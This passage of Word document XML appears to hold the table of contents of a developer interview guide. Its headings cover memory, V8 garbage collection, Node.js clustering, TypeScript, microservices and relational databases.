              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="690401ED" w14:textId="5D41B0E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73" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between stack memory and heap memory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77</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59CAC2BA" w14:textId="288FBC3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74" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How does the V8 engine handle garbage collection.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78</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="529D4D69" w14:textId="2FEFA73B"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75" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is buffer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78</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77AF87F0" w14:textId="4E0DCC5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76" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Why is it important to avoid using global variables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79</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23FEF761" w14:textId="0593D512"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77" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Clustering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81</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0764FB04" w14:textId="7799B02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78" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is Node.js clustering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81</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47FE7376" w14:textId="3C96F7D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79" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Can you describe a scenario where Node.js clustering might not be the best solution for scaling an application?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_Toc178383279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81</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07A059C0" w14:textId="68FCE47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80" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are the advantages and disadvantages of clustering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81</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D9FD319" w14:textId="4DEEBAD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81" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>For what purpose we will use OS module for clustering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82</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67723055" w14:textId="162B5A1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82" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the default load balancer is being used for clusting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83</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22B52D4F" w14:textId="34C41A0C"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83" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>TypeScript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85</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B97EFEA" w14:textId="0E2DFED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84" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is TypeScript, and how does it differ from JavaScript?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85</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EDBB109" w14:textId="44DE54B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85" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are the differences between interfaces and type aliases in TypeScript?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86</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D23759E" w14:textId="4A8A2A3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86" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you handle null and undefined in TypeScript?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87</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="146415F4" w14:textId="3F0EE9C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87" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of generics in TypeScript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89</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EAAE62A" w14:textId="424E141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88" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are decorators in TypeScript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90</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D4CBFC2" w14:textId="706619F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89" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of type guards in TypeScript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_Toc178383289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92</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="646561E5" w14:textId="485F2A0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90" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the never type in TypeScript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94</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20698807" w14:textId="3891F8A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91" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you handle enums in TypeScript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95</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B94355C" w14:textId="3FFE62D7"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292" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Micro-Service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98</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FCFC278" w14:textId="1DE2C88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93" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do microservices communicate with each other?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98</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70644A56" w14:textId="445FA6D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94" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain various communication protocols and patterns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99</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5284AFCA" w14:textId="1C97132B"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95" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of service discovery in microservices architecture.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101</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4758BD9C" w14:textId="703014C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96" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is containerization, and how does it relate to microservices?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103</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="326EF2B9" w14:textId="4B4BD98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97" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the role of API gateways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105</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65627002" w14:textId="20CC41C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98" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the differences between synchronous and asynchronous communication in microservices.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107</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C6FDD8A" w14:textId="2A3679E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299" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are the security measures that can be implemented for an API gateway in a microservices architecture.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_Toc178383299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108</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A929E52" w14:textId="3067777D"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300" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Database –</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110</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25D0898E" w14:textId="3610500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01" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the concept of normalization in relational databases.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110</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C39D74A" w14:textId="58B15DB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02" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is ACID transactions?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111</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62050F64" w14:textId="619E617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03" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between a join and a subquery in SQL?</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111</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="772C638A" w14:textId="1AAD1BE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04" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are stored procedures and triggers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113</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CF39AC4" w14:textId="47BA40D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05" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the differences between clustered and non-clustered indexes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114</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2885584D" w14:textId="7BE021D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06" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are some common optimization techniques for improving the performance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115</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
